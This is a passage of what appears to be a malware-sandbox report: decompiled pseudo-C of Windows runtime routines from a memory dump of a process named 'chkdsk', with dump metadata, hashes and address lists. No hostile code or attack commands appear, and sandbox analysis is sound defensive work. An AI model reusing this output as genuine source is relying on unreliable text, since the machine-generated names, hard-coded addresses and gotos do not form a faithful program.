                                                      								goto L3;
                                                      							}
                                                      							__eflags = _t53 - 0xc0000012;
                                                      							if(__eflags == 0) {
                                                      								L12:
                                                      								_t11 = _t104 + 0xe; // 0x302bc802
                                                      								_t13 = _t104 + 0xc; // 0x302bbd
                                                      								_t93 = _t13;
                                                      								 *((char*)(_t108 + 0x12)) = 0;
                                                      								__eflags = E04DBF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
                                                      								if(__eflags >= 0) {
                                                      									L15:
                                                      									_t102 = _v28;
                                                      									 *_t102 = 2;
                                                      									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                      									E04D9EEF0(0x4e779a0);
                                                      									__eflags =  *0x4e78210 - _t104; // 0x302bb0
                                                      									if(__eflags == 0) {
                                                      										__eflags =  *((char*)(_t108 + 0xe));
                                                      										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                      										 *0x4e78210 = _t102;
                                                      										_t32 = _t102 + 0xc; // 0x0
                                                      										 *_t95 =  *_t32;
                                                      										_t33 = _t102 + 0x10; // 0x0
                                                      										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                      										_t35 = _t102 + 4; // 0xffffffff
                                                      										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                      										if(__eflags != 0) {
                                                      											_t37 = _t104 + 0x10; // 0x2000302b
                                                      											_t95 =  *((intOrPtr*)( *_t37));
                                                      											E04E04888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
                                                      										}
                                                      										E04D9EB70(_t95, 0x4e779a0);
                                                      										asm("lock xadd [esi], eax");
                                                      										if(__eflags == 0) {
                                                      											_t38 = _t104 + 4; // 0x0
                                                      											_push( *_t38);
                                                      											E04DC95D0();
                                                      											L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                      										}
                                                      										asm("lock xadd [esi], ebx");
                                                      										__eflags = _t89 == 1;
                                                      										if(_t89 == 1) {
                                                      											_t41 = _t104 + 4; // 0x0
                                                      											_push( *_t41);
                                                      											E04DC95D0();
                                                      											L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                      										}
                                                      										_t49 = _t102;
                                                      										L4:
                                                      										return _t49;
                                                      									}
                                                      									E04D9EB70(_t93, 0x4e779a0);
                                                      									asm("lock xadd [esi], eax");
                                                      									if(__eflags == 0) {
                                                      										_t25 = _t104 + 4; // 0x0
                                                      										_push( *_t25);
                                                      										E04DC95D0();
                                                      										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                      										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                      									}
                                                      									 *_t102 = 1;
                                                      									asm("lock xadd [edi], eax");
                                                      									if(__eflags == 0) {
                                                      										_t28 = _t102 + 4; // 0xffffffff
                                                      										_push( *_t28);
                                                      										E04DC95D0();
                                                      										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                      									}
                                                      									continue;
                                                      								}
                                                      								_t15 = _t104 + 0x10; // 0x2000302b
                                                      								_t93 =  &_v20;
                                                      								_t17 = _t104 + 0xe; // 0x302bc802
                                                      								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
                                                      								_t85 = 6;
                                                      								_v20 = _t85;
                                                      								_t87 = E04DBF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
                                                      								__eflags = _t87;
                                                      								if(_t87 < 0) {
                                                      									goto L3;
                                                      								}
                                                      								 *((char*)(_t108 + 0xe)) = 1;
                                                      								goto L15;
                                                      							}
                                                      							__eflags = _t53 - 0xc000026e;
                                                      							if(__eflags != 0) {
                                                      								goto L3;
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                      						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                      							goto L3;
                                                      						} else {
                                                      							goto L9;
                                                      						}
                                                      					}
                                                      					L3:
                                                      					_t49 = _t104;
                                                      					goto L4;
                                                      				}
                                                      				_t49 = 0;
                                                      				goto L4;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e223b501ff99e497af99915dcb241a8f8fc2afbf76288ffc61346c019088cf4
                                                      • Instruction ID: 42a65a0e4c6058351749902cfcb77ca2e92e35ed4d1967672460b7a80dc339ed
                                                      • Opcode Fuzzy Hash: 6e223b501ff99e497af99915dcb241a8f8fc2afbf76288ffc61346c019088cf4
                                                      • Instruction Fuzzy Hash: 3951CA71205742EBE722EF68C840B27BBE4FF40718F10491EE49587691EBB0F810CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DB2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                      				signed short* _v8;
                                                      				signed short* _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr* _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				short _t56;
                                                      				signed int _t57;
                                                      				intOrPtr _t58;
                                                      				signed short* _t61;
                                                      				intOrPtr _t72;
                                                      				intOrPtr _t75;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t87;
                                                      				intOrPtr* _t90;
                                                      				signed short* _t91;
                                                      				signed int _t95;
                                                      				signed short* _t96;
                                                      				intOrPtr _t97;
                                                      				intOrPtr _t102;
                                                      				signed int _t108;
                                                      				intOrPtr _t110;
                                                      				signed int _t111;
                                                      				signed short* _t112;
                                                      				void* _t113;
                                                      				signed int _t116;
                                                      				signed short** _t119;
                                                      				short* _t120;
                                                      				signed int _t123;
                                                      				signed int _t124;
                                                      				void* _t125;
                                                      				intOrPtr _t127;
                                                      				signed int _t128;
                                                      
                                                      				_t90 = __ecx;
                                                      				_v16 = __edx;
                                                      				_t108 = _a4;
                                                      				_v28 = __ecx;
                                                      				_t4 = _t108 - 1; // -1
                                                      				if(_t4 > 0x13) {
                                                      					L15:
                                                      					_t56 = 0xc0000100;
                                                      					L16:
                                                      					return _t56;
                                                      				}
                                                      				_t57 = _t108 * 0x1c;
                                                      				_v32 = _t57;
                                                      				_t6 = _t57 + 0x4e78204; // 0x0
                                                      				_t123 =  *_t6;
                                                      				_t7 = _t57 + 0x4e78208; // 0x4e78207
                                                      				_t8 = _t57 + 0x4e78208; // 0x4e78207
                                                      				_t119 = _t8;
                                                      				_v36 = _t123;
                                                      				_t110 = _t7 + _t123 * 8;
                                                      				_v24 = _t110;
                                                      				_t111 = _a4;
                                                      				if(_t119 >= _t110) {
                                                      					L12:
                                                      					if(_t123 != 3) {
                                                      						_t58 =  *0x4e78450; // 0x3010f2
                                                      						if(_t58 == 0) {
                                                      							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                      						}
                                                      					} else {
                                                      						_t26 = _t57 + 0x4e7821c; // 0x0
                                                      						_t58 =  *_t26;
                                                      					}
                                                      					 *_t90 = _t58;
                                                      					goto L15;
                                                      				} else {
                                                      					goto L2;
                                                      				}
                                                      				while(1) {
                                                      					_t116 =  *_t61 & 0x0000ffff;
                                                      					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                      					if(_t116 == _t128) {
                                                      						goto L18;
                                                      					}
                                                      					L5:
                                                      					if(_t116 >= 0x61) {
                                                      						if(_t116 > 0x7a) {
                                                      							_t97 =  *0x4e76d5c; // 0xff050654
                                                      							_t72 =  *0x4e76d5c; // 0xff050654
                                                      							_t75 =  *0x4e76d5c; // 0xff050654
                                                      							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                      						} else {
                                                      							_t116 = _t116 - 0x20;
                                                      						}
                                                      					}
                                                      					if(_t128 >= 0x61) {
                                                      						if(_t128 > 0x7a) {
                                                      							_t102 =  *0x4e76d5c; // 0xff050654
                                                      							_t84 =  *0x4e76d5c; // 0xff050654
                                                      							_t87 =  *0x4e76d5c; // 0xff050654
                                                      							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                      						} else {
                                                      							_t128 = _t128 - 0x20;
                                                      						}
                                                      					}
                                                      					if(_t116 == _t128) {
                                                      						_t61 = _v12;
                                                      						_t96 = _v8;
                                                      					} else {
                                                      						_t113 = _t116 - _t128;
                                                      						L9:
                                                      						_t111 = _a4;
                                                      						if(_t113 == 0) {
                                                      							_t115 =  &(( *_t119)[_t111 + 1]);
                                                      							_t33 =  &(_t119[1]); // 0x100
                                                      							_t120 = _a8;
                                                      							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                      							_t35 = _t95 - 1; // 0xff
                                                      							_t124 = _t35;
                                                      							if(_t120 == 0) {
                                                      								L27:
                                                      								 *_a16 = _t95;
                                                      								_t56 = 0xc0000023;
                                                      								goto L16;
                                                      							}
                                                      							if(_t124 >= _a12) {
                                                      								if(_a12 >= 1) {
                                                      									 *_t120 = 0;
                                                      								}
                                                      								goto L27;
                                                      							}
                                                      							 *_a16 = _t124;
                                                      							_t125 = _t124 + _t124;
                                                      							E04DCF3E0(_t120, _t115, _t125);
                                                      							_t56 = 0;
                                                      							 *((short*)(_t125 + _t120)) = 0;
                                                      							goto L16;
                                                      						}
                                                      						_t119 =  &(_t119[2]);
                                                      						if(_t119 < _v24) {
                                                      							L2:
                                                      							_t91 =  *_t119;
                                                      							_t61 = _t91;
                                                      							_v12 = _t61;
                                                      							_t112 =  &(_t61[_t111]);
                                                      							_v8 = _t112;
                                                      							if(_t61 >= _t112) {
                                                      								break;
                                                      							} else {
                                                      								_t127 = _v16 - _t91;
                                                      								_t96 = _t112;
                                                      								_v20 = _t127;
                                                      								_t116 =  *_t61 & 0x0000ffff;
                                                      								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                      								if(_t116 == _t128) {
                                                      									goto L18;
                                                      								}
                                                      								goto L5;
                                                      							}
                                                      						} else {
                                                      							_t90 = _v28;
                                                      							_t57 = _v32;
                                                      							_t123 = _v36;
                                                      							goto L12;
                                                      						}
                                                      					}
                                                      					L18:
                                                      					_t61 =  &(_t61[1]);
                                                      					_v12 = _t61;
                                                      					if(_t61 >= _t96) {
                                                      						break;
                                                      					}
                                                      					_t127 = _v20;
                                                      				}
                                                      				_t113 = 0;
                                                      				goto L9;
                                                      			}







































                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90698d608a70f9ebd2d76ad9be6835ef0b80f216cc763233946e17bd19ca0dc8
                                                      • Instruction ID: d91a6986c22025477e7758d6ebe0384e1e14f7e44ba19f7eb571eaca9b015c29
                                                      • Opcode Fuzzy Hash: 90698d608a70f9ebd2d76ad9be6835ef0b80f216cc763233946e17bd19ca0dc8
                                                      • Instruction Fuzzy Hash: 9B51CE77B00115CB8B14DF19C8988FEB7B1FB88711705849AE8869B319EA34FE40DBD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E04E4AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed short* _t36;
                                                      				signed int _t41;
                                                      				char* _t42;
                                                      				intOrPtr _t43;
                                                      				signed int _t47;
                                                      				void* _t52;
                                                      				signed int _t57;
                                                      				intOrPtr _t61;
                                                      				signed char _t62;
                                                      				signed int _t72;
                                                      				signed char _t85;
                                                      				signed int _t88;
                                                      
                                                      				_t73 = __edx;
                                                      				_push(__ecx);
                                                      				_t85 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                      				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                      				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                      					_t57 = _t57 | 0x00000001;
                                                      				}
                                                      				_t88 = 0;
                                                      				_t36 = 0;
                                                      				_t96 = _a12;
                                                      				if(_a12 == 0) {
                                                      					_t62 = _a8;
                                                      					__eflags = _t62;
                                                      					if(__eflags == 0) {
                                                      						goto L12;
                                                      					}
                                                      					_t52 = E04E4C38B(_t85, _t73, _t57, 0);
                                                      					_t62 = _a8;
                                                      					 *_t62 = _t52;
                                                      					_t36 = 0;
                                                      					goto L11;
                                                      				} else {
                                                      					_t36 = E04E4ACFD(_t85, _t73, _t96, _t57, _a8);
                                                      					if(0 == 0 || 0 == 0xffffffff) {
                                                      						_t72 = _t88;
                                                      					} else {
                                                      						_t72 =  *0x00000000 & 0x0000ffff;
                                                      					}
                                                      					 *_a12 = _t72;
                                                      					_t62 = _a8;
                                                      					L11:
                                                      					_t73 = _v8;
                                                      					L12:
                                                      					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                      						L19:
                                                      						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                      							L22:
                                                      							_t74 = _v8;
                                                      							__eflags = _v8;
                                                      							if(__eflags != 0) {
                                                      								L25:
                                                      								__eflags = _t88 - 2;
                                                      								if(_t88 != 2) {
                                                      									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                      									_t88 = E04E4FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                      									goto L34;
                                                      								}
                                                      								L26:
                                                      								_t59 = _v8;
                                                      								E04E4EA55(_t85, _v8, _t57);
                                                      								asm("sbb esi, esi");
                                                      								_t88 =  ~_t88;
                                                      								_t41 = E04DA7D50();
                                                      								__eflags = _t41;
                                                      								if(_t41 == 0) {
                                                      									_t42 = 0x7ffe0380;
                                                      								} else {
                                                      									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      								}
                                                      								__eflags =  *_t42;
                                                      								if( *_t42 != 0) {
                                                      									_t43 =  *[fs:0x30];
                                                      									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                      									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                      										__eflags = _t88;
                                                      										if(_t88 != 0) {
                                                      											E04E41608(_t85, _t59, 3);
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L34;
                                                      							}
                                                      							_push(_t62);
                                                      							_t47 = E04E51536(0x4e78ae4, (_t74 -  *0x4e78b04 >> 0x14) + (_t74 -  *0x4e78b04 >> 0x14), _t88, __eflags);
                                                      							__eflags = _t47;
                                                      							if(_t47 == 0) {
                                                      								goto L26;
                                                      							}
                                                      							_t74 = _v12;
                                                      							_t27 = _t47 - 1; // -1
                                                      							_t88 = _t27;
                                                      							goto L25;
                                                      						}
                                                      						_t62 = _t85;
                                                      						if(L04E4C323(_t62, _v8, _t57) != 0xffffffff) {
                                                      							goto L22;
                                                      						}
                                                      						_push(_t62);
                                                      						_push(_t88);
                                                      						E04E4A80D(_t85, 9, _v8, _t88);
                                                      						goto L34;
                                                      					} else {
                                                      						_t101 = _t36;
                                                      						if(_t36 != 0) {
                                                      							L16:
                                                      							if(_t36 == 0xffffffff) {
                                                      								goto L19;
                                                      							}
                                                      							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                      							if((_t62 & 0x0000000f) == 0) {
                                                      								goto L19;
                                                      							}
                                                      							_t62 = _t62 & 0xf;
                                                      							if(E04E2CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                      								L34:
                                                      								return _t88;
                                                      							}
                                                      							goto L19;
                                                      						}
                                                      						_t62 = _t85;
                                                      						_t36 = E04E4ACFD(_t62, _t73, _t101, _t57, _t62);
                                                      						if(_t36 == 0) {
                                                      							goto L19;
                                                      						}
                                                      						goto L16;
                                                      					}
                                                      				}
                                                      			}



















                                                      0x04e4afa3
                                                      0x04e4afa9
                                                      0x04e4afb0
                                                      0x04e4afb2
                                                      0x04e4afb4
                                                      0x04e4afbc
                                                      0x04e4afbc
                                                      0x04e4afb4
                                                      0x04e4afb0
                                                      0x00000000
                                                      0x04e4afa1
                                                      0x04e4af4f
                                                      0x04e4af57
                                                      0x04e4af5c
                                                      0x04e4af5e
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4af60
                                                      0x04e4af64
                                                      0x04e4af64
                                                      0x00000000
                                                      0x04e4af64
                                                      0x04e4af1a
                                                      0x04e4af25
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4af27
                                                      0x04e4af28
                                                      0x04e4af33
                                                      0x00000000
                                                      0x04e4aed0
                                                      0x04e4aed0
                                                      0x04e4aed2
                                                      0x04e4aee1
                                                      0x04e4aee4
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aee6
                                                      0x04e4aeec
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aefb
                                                      0x04e4af07
                                                      0x04e4afd3
                                                      0x04e4afdb
                                                      0x04e4afdb
                                                      0x00000000
                                                      0x04e4af07
                                                      0x04e4aed6
                                                      0x04e4aed8
                                                      0x04e4aedf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aedf
                                                      0x04e4aec9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63ea9ecca5ee797cb8640c74d9434f2b4c7489f4660c3119dbc65472ac85e63f
                                                      • Instruction ID: ed941bc497cdb36161f985c60e618def6e132e7abe32b2901ed9249bc1c359cc
                                                      • Opcode Fuzzy Hash: 63ea9ecca5ee797cb8640c74d9434f2b4c7489f4660c3119dbc65472ac85e63f
                                                      • Instruction Fuzzy Hash: D941F5B17442119BDB25DF25E884B7BB39AEFC4738F045229F82687290D734F941C6A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E04DADBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				char _v5;
                                                      				signed int _v12;
                                                      				signed int* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v44;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t54;
                                                      				char* _t58;
                                                      				signed int _t66;
                                                      				intOrPtr _t67;
                                                      				intOrPtr _t68;
                                                      				intOrPtr _t72;
                                                      				intOrPtr _t73;
                                                      				signed int* _t75;
                                                      				intOrPtr _t79;
                                                      				intOrPtr _t80;
                                                      				char _t82;
                                                      				signed int _t83;
                                                      				signed int _t84;
                                                      				signed int _t88;
                                                      				signed int _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t92;
                                                      				signed int _t97;
                                                      				intOrPtr _t98;
                                                      				intOrPtr* _t99;
                                                      				signed int* _t101;
                                                      				signed int* _t102;
                                                      				intOrPtr* _t103;
                                                      				intOrPtr _t105;
                                                      				signed int _t106;
                                                      				void* _t118;
                                                      
                                                      				_t92 = __edx;
                                                      				_t75 = _a4;
                                                      				_t98 = __ecx;
                                                      				_v44 = __edx;
                                                      				_t106 = _t75[1];
                                                      				_v40 = __ecx;
                                                      				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                      					_t82 = 0;
                                                      				} else {
                                                      					_t82 = 1;
                                                      				}
                                                      				_v5 = _t82;
                                                      				_t6 = _t98 + 0xc8; // 0xc9
                                                      				_t101 = _t6;
                                                      				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                      				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                      				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                      				if(_t82 != 0) {
                                                      					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                      					_t83 =  *_t75;
                                                      					_t54 = _t75[1];
                                                      					 *_t101 = _t83;
                                                      					_t84 = _t83 | _t54;
                                                      					_t101[1] = _t54;
                                                      					if(_t84 == 0) {
                                                      						_t101[1] = _t101[1] & _t84;
                                                      						 *_t101 = 1;
                                                      					}
                                                      					goto L19;
                                                      				} else {
                                                      					if(_t101 == 0) {
                                                      						E04D8CC50(E04D84510(0xc000000d));
                                                      						_t88 =  *_t101;
                                                      						_t97 = _t101[1];
                                                      						L15:
                                                      						_v12 = _t88;
                                                      						_t66 = _t88 -  *_t75;
                                                      						_t89 = _t97;
                                                      						asm("sbb ecx, [ebx+0x4]");
                                                      						_t118 = _t89 - _t97;
                                                      						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                      							_t66 = _t66 | 0xffffffff;
                                                      							_t89 = 0x7fffffff;
                                                      						}
                                                      						 *_t101 = _t66;
                                                      						_t101[1] = _t89;
                                                      						L19:
                                                      						if(E04DA7D50() != 0) {
                                                      							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      						} else {
                                                      							_t58 = 0x7ffe0386;
                                                      						}
                                                      						_t102 = _v16;
                                                      						if( *_t58 != 0) {
                                                      							_t58 = E04E58ED6(_t102, _t98);
                                                      						}
                                                      						_t76 = _v44;
                                                      						E04DA2280(_t58, _v44);
                                                      						E04DADD82(_v44, _t102, _t98);
                                                      						E04DAB944(_t102, _v5);
                                                      						return E04D9FFB0(_t76, _t98, _t76);
                                                      					}
                                                      					_t99 = 0x7ffe03b0;
                                                      					do {
                                                      						_t103 = 0x7ffe0010;
                                                      						do {
                                                      							_t67 =  *0x4e78628; // 0x0
                                                      							_v28 = _t67;
                                                      							_t68 =  *0x4e7862c; // 0x0
                                                      							_v32 = _t68;
                                                      							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                      							_v20 =  *_t99;
                                                      							while(1) {
                                                      								_t97 =  *0x7ffe000c;
                                                      								_t90 =  *0x7FFE0008;
                                                      								if(_t97 ==  *_t103) {
                                                      									goto L10;
                                                      								}
                                                      								asm("pause");
                                                      							}
                                                      							L10:
                                                      							_t79 = _v24;
                                                      							_t99 = 0x7ffe03b0;
                                                      							_v12 =  *0x7ffe03b0;
                                                      							_t72 =  *0x7FFE03B4;
                                                      							_t103 = 0x7ffe0010;
                                                      							_v36 = _t72;
                                                      						} while (_v20 != _v12 || _t79 != _t72);
                                                      						_t73 =  *0x4e78628; // 0x0
                                                      						_t105 = _v28;
                                                      						_t80 =  *0x4e7862c; // 0x0
                                                      					} while (_t105 != _t73 || _v32 != _t80);
                                                      					_t98 = _v40;
                                                      					asm("sbb edx, [ebp-0x20]");
                                                      					_t88 = _t90 - _v12 - _t105;
                                                      					_t75 = _a4;
                                                      					asm("sbb edx, eax");
                                                      					_t31 = _t98 + 0xc8; // 0x4e4fb53
                                                      					_t101 = _t31;
                                                      					 *_t101 = _t88;
                                                      					_t101[1] = _t97;
                                                      					goto L15;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f8f712b7de28f84c7272ef137b648442a0a4f457cc18fe784656d01f3ac5986
                                                      • Instruction ID: fb5428dad31f74165170d709eed741ccd38da9585403a38dd9f7a596236554c0
                                                      • Opcode Fuzzy Hash: 0f8f712b7de28f84c7272ef137b648442a0a4f457cc18fe784656d01f3ac5986
                                                      • Instruction Fuzzy Hash: CB519B71A00605DFCF14DFA8C480AAEBBF2FB48310F21855AD995A7744EB70B954CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E04D9EF40(intOrPtr __ecx) {
                                                      				char _v5;
                                                      				char _v6;
                                                      				char _v7;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t58;
                                                      				char _t59;
                                                      				signed char _t69;
                                                      				void* _t73;
                                                      				signed int _t74;
                                                      				char _t79;
                                                      				signed char _t81;
                                                      				signed int _t85;
                                                      				signed int _t87;
                                                      				intOrPtr _t90;
                                                      				signed char* _t91;
                                                      				void* _t92;
                                                      				signed int _t94;
                                                      				void* _t96;
                                                      
                                                      				_t90 = __ecx;
                                                      				_v16 = __ecx;
                                                      				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                      					_t58 =  *((intOrPtr*)(__ecx));
                                                      					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                      						E04D89080(_t73, __ecx, __ecx, _t92);
                                                      					}
                                                      				}
                                                      				_t74 = 0;
                                                      				_t96 =  *0x7ffe036a - 1;
                                                      				_v12 = 0;
                                                      				_v7 = 0;
                                                      				if(_t96 > 0) {
                                                      					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                      					_v12 = _t74;
                                                      					_v7 = _t96 != 0;
                                                      				}
                                                      				_t79 = 0;
                                                      				_v8 = 0;
                                                      				_v5 = 0;
                                                      				while(1) {
                                                      					L4:
                                                      					_t59 = 1;
                                                      					L5:
                                                      					while(1) {
                                                      						if(_t59 == 0) {
                                                      							L12:
                                                      							_t21 = _t90 + 4; // 0x775ec21e
                                                      							_t87 =  *_t21;
                                                      							_v6 = 0;
                                                      							if(_t79 != 0) {
                                                      								if((_t87 & 0x00000002) != 0) {
                                                      									goto L19;
                                                      								}
                                                      								if((_t87 & 0x00000001) != 0) {
                                                      									_v6 = 1;
                                                      									_t74 = _t87 ^ 0x00000003;
                                                      								} else {
                                                      									_t51 = _t87 - 2; // -2
                                                      									_t74 = _t51;
                                                      								}
                                                      								goto L15;
                                                      							} else {
                                                      								if((_t87 & 0x00000001) != 0) {
                                                      									_v6 = 1;
                                                      									_t74 = _t87 ^ 0x00000001;
                                                      								} else {
                                                      									_t26 = _t87 - 4; // -4
                                                      									_t74 = _t26;
                                                      									if((_t74 & 0x00000002) == 0) {
                                                      										_t74 = _t74 - 2;
                                                      									}
                                                      								}
                                                      								L15:
                                                      								if(_t74 == _t87) {
                                                      									L19:
                                                      									E04D82D8A(_t74, _t90, _t87, _t90);
                                                      									_t74 = _v12;
                                                      									_v8 = 1;
                                                      									if(_v7 != 0 && _t74 > 0x64) {
                                                      										_t74 = _t74 - 1;
                                                      										_v12 = _t74;
                                                      									}
                                                      									_t79 = _v5;
                                                      									goto L4;
                                                      								}
                                                      								asm("lock cmpxchg [esi], ecx");
                                                      								if(_t87 != _t87) {
                                                      									_t74 = _v12;
                                                      									_t59 = 0;
                                                      									_t79 = _v5;
                                                      									continue;
                                                      								}
                                                      								if(_v6 != 0) {
                                                      									_t74 = _v12;
                                                      									L25:
                                                      									if(_v7 != 0) {
                                                      										if(_t74 < 0x7d0) {
                                                      											if(_v8 == 0) {
                                                      												_t74 = _t74 + 1;
                                                      											}
                                                      										}
                                                      										_t38 = _t90 + 0x14; // 0x0
                                                      										_t39 = _t90 + 0x14; // 0x0
                                                      										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
